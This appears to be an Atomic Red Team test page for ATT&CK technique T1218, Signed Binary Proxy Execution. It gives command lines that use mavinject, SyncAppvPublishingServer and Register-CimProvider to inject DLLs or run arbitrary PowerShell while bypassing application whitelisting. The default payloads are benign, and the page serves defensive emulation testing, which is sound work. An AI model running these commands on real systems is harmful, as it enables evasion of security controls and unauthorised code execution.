T1218.md

T1218 - Signed Binary Proxy Execution

Description from ATT&CK

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.

Mavinject.exe

Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. (Citation: Twitter gN3mes1s Status Update MavInject32)

"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" /INJECTRUNNING C:\Windows\system32\mavinject.exe /INJECTRUNNING

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe. (Citation: Twitter monoxgas Status Update SyncAppvPublishingServer)

Several others binaries exist that may be used to perform similar behavior. (Citation: GitHub Ultimate AppLocker Bypass List)

Atomic Tests

• Atomic Test #1 - mavinject - Inject DLL into running process

• Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

• Atomic Test #3 - Register-CimProvider - Execute evil dll

Atomic Test #1 - mavinject - Inject DLL into running process

Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.

Supported Platforms: Windows

Inputs

Name	Description	Type	Default Value
dll_payload	DLL to inject	Path	C:\AtomicRedTeam\atomics\T1218\src\x64\T1218.dll
process_id	PID of process receiving injection	string	1000

Run it with command_prompt!

mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}

Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.

Supported Platforms: Windows

Inputs

Name	Description	Type	Default Value
powershell_code	PowerShell code to execute	string	Start-Process calc.exe

Run it with command_prompt!

SyncAppvPublishingServer.exe "n; #{powershell_code}"

Atomic Test #3 - Register-CimProvider - Execute evil dll

Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB

Supported Platforms: Windows

Inputs

Name	Description	Type	Default Value
dll_payload	DLL to execute	Path	C:\AtomicRedTeam\atomics\T1218\src\Win32\T1218-2.dll

Run it with command_prompt!

C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}